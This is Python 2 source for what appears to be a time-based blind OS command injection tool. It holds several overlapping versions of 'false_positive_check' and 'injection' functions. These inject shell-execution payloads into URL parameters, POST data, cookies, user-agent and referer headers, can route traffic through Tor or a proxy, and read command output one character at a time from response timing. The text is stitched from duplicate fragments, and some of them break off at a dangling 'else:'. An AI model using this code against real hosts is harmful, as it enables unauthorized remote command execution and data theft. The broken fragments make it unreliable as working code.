def false_positive_check(separator, TAG, cmd, prefix, suffix, delay,
http_request_method, url, vuln_parameter, randvcalc,
alter_shell):
found_chars = False
if menu.options.verbose:
sys.stdout.write("\n(*) Testing the reliability of used payload... ")
sys.stdout.flush()
for output_length in range(1, 3):
if alter_shell:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution_alter_shell(
separator, cmd, output_length, delay, http_request_method)
else:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution(separator, cmd, output_length,
delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload.replace("\n", "\\n") + Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter,
http_request_method, url)
if how_long >= delay:
found_chars = True
break
if found_chars == True:
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = 0
sys.stdout.flush()
for num_of_chars in range(1, int(num_of_chars)):
for ascii_char in range(1, 3):
if alter_shell:
# Get the execution output, of shell execution.
payload = tb_payloads.fp_result_alter_shell(
separator, cmd, num_of_chars, ascii_char, delay,
http_request_method)
else:
# Get the execution output, of shell execution.
payload = tb_payloads.fp_result(separator, cmd,
num_of_chars, ascii_char,
delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload.replace("\n", "\\n") +
Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter,
payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(
url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter,
payload)
else:
how_long = examine_requests(payload, vuln_parameter,
http_request_method, url)
if how_long >= delay:
output.append(ascii_char)
break
check_end = time.time()
check_how_long = int(check_end - check_start)
output = "".join(str(p) for p in output)
if str(output) == str(randvcalc):
return output
#eof
def false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell):
found_chars = False
if menu.options.verbose:
sys.stdout.write("\n(*) Testing the reliability of used payload... ")
sys.stdout.flush()
for output_length in range(1, 3):
if alter_shell:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method)
else:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url)
if how_long >= delay:
found_chars = True
break
if found_chars == True :
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = 0
sys.stdout.flush()
for num_of_chars in range(1, int(num_of_chars)):
for ascii_char in range(1, 3):
if alter_shell:
# Get the execution output, of shell execution.
payload = tb_payloads.fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
else:
# Get the execution output, of shell execution.
payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url)
if how_long >= delay:
output.append(ascii_char)
break
check_end = time.time()
check_how_long = int(check_end - check_start)
output = "".join(str(p) for p in output)
if str(output) == str(randvcalc):
return output
#eof
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay,
http_request_method, url, vuln_parameter, alter_shell):
if menu.options.file_write or menu.options.file_upload:
minlen = 0
else:
minlen = 1
found_chars = False
sys.stdout.write("\n(*) Retrieving the length of execution output... ")
sys.stdout.flush()
for output_length in range(int(minlen), int(maxlen)):
if alter_shell:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution_alter_shell(
separator, cmd, output_length, delay, http_request_method)
else:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution(separator, cmd, output_length,
delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload.replace("\n", "\\n") + Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter,
http_request_method, url)
if how_long >= delay:
if menu.options.verbose:
print "\n"
else:
sys.stdout.write("[" + Fore.GREEN + " SUCCEED " +
Style.RESET_ALL + "]\n")
sys.stdout.flush()
print Style.BRIGHT + "(!) Retrieved " + str(
output_length) + " characters." + Style.RESET_ALL
found_chars = True
break
if found_chars == True:
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = 0
sys.stdout.write("\r(*) Grabbing the output, please wait... [ " +
str(percent) + "% ]")
sys.stdout.flush()
for num_of_chars in range(1, int(num_of_chars)):
for ascii_char in range(32, 129):
if alter_shell:
# Get the execution output, of shell execution.
payload = tb_payloads.get_char_alter_shell(
separator, cmd, num_of_chars, ascii_char, delay,
http_request_method)
else:
# Get the execution output, of shell execution.
payload = tb_payloads.get_char(separator, cmd,
num_of_chars, ascii_char,
delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload.replace("\n", "\\n") +
Style.RESET_ALL)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter,
payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(
url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter,
payload)
else:
how_long = examine_requests(payload, vuln_parameter,
http_request_method, url)
if how_long >= delay:
if not menu.options.verbose:
output.append(chr(ascii_char))
percent = ((num_of_chars * 100) / output_length)
sys.stdout.write(
"\r(*) Grabbing the output, please wait... [ " +
str(percent) + "% ]")
sys.stdout.flush()
else:
output.append(chr(ascii_char))
break
check_end = time.time()
check_how_long = int(check_end - check_start)
output = "".join(str(p) for p in output)
else:
check_start = 0
sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n")
sys.stdout.flush()
check_how_long = 0
output = ""
return check_how_long, output
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell):
if menu.options.file_write or menu.options.file_upload:
minlen = 0
else:
minlen = 1
found_chars = False
sys.stdout.write("\n(*) Retrieving the length of execution output... ")
sys.stdout.flush()
for output_length in range(int(minlen), int(maxlen)):
if alter_shell:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method)
else:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url)
if how_long >= delay:
if menu.options.verbose:
print "\n"
else:
sys.stdout.write("["+Fore.GREEN+" SUCCEED "+ Style.RESET_ALL+"]\n")
sys.stdout.flush()
print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters."+ Style.RESET_ALL
found_chars = True
break
if found_chars == True :
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = 0
sys.stdout.write("\r(*) Grabbing the output, please wait... [ "+str(percent)+"% ]")
sys.stdout.flush()
for num_of_chars in range(1, int(num_of_chars)):
for ascii_char in range(32, 129):
if alter_shell:
# Get the execution output, of shell execution.
payload = tb_payloads.get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
else:
# Get the execution output, of shell execution.
payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url)
if how_long >= delay:
if not menu.options.verbose:
output.append(chr(ascii_char))
percent = ((num_of_chars*100)/output_length)
sys.stdout.write("\r(*) Grabbing the output, please wait... [ "+str(percent)+"% ]")
sys.stdout.flush()
else:
output.append(chr(ascii_char))
break
check_end = time.time()
check_how_long = int(check_end - check_start)
output = "".join(str(p) for p in output)
else:
check_start = 0
sys.stdout.write("["+Fore.RED+" FAILED "+ Style.RESET_ALL+"]\n")
sys.stdout.flush()
check_how_long = 0
output = ""
return check_how_long, output
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell):
if menu.options.file_write or menu.options.file_upload:
minlen = 0
else:
minlen = 1
found_chars = False
sys.stdout.write("\n(*) Retrieving the length of execution output... ")
sys.stdout.flush()
for output_length in range(int(minlen), int(maxlen)):
if alter_shell:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method)
else:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
else:
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
payload = urllib.quote(payload)
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
raise SystemExit()
else:
try:
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
raise SystemExit()
def injection(separator,maxlen,TAG,cmd,prefix,suffix,delay,http_request_method,url,vuln_parameter):
print "\n(*) Retrieving the length of execution output..."
for j in range(1,int(maxlen)):
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution(separator,cmd,j,delay,http_request_method)
# Check if defined "--prefix" option.
if menu.options.prefix:
prefix = menu.options.prefix
payload = prefix + payload
else:
payload = prefix + payload
# Check if defined "--suffix" option.
if menu.options.suffix:
suffix = menu.options.suffix
payload = payload + suffix
else:
payload = payload + suffix
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
payload = urllib.quote(payload)
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
#print target
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
response.read()
# Check if defined method is POST.
else :
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell):
if menu.options.file_write or menu.options.file_upload:
minlen = 0
else:
minlen = 1
found_chars = False
sys.stdout.write("\n(*) Retrieving the length of execution output... ")
sys.stdout.flush()
for output_length in range(int(minlen), int(maxlen)):
if alter_shell:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method)
else:
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
else:
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
payload = urllib.quote(payload)
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
raise SystemExit()
else:
try:
response = urllib2.urlopen(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
raise SystemExit()
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay,
http_request_method, url, vuln_parameter):
print "\n(*) Retrieving the length of execution output..."
for j in range(1, int(maxlen)):
# Execute shell commands on vulnerable host.
payload = tb_payloads.cmd_execution(separator, cmd, j, delay,
http_request_method)
# Check if defined "--prefix" option.
if menu.options.prefix:
prefix = menu.options.prefix
payload = prefix + payload
else:
payload = prefix + payload
# Check if defined "--suffix" option.
if menu.options.suffix:
suffix = menu.options.suffix
payload = payload + suffix
else:
payload = payload + suffix
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
payload = urllib.quote(payload)
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
#print target
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
response.read()
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy = urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
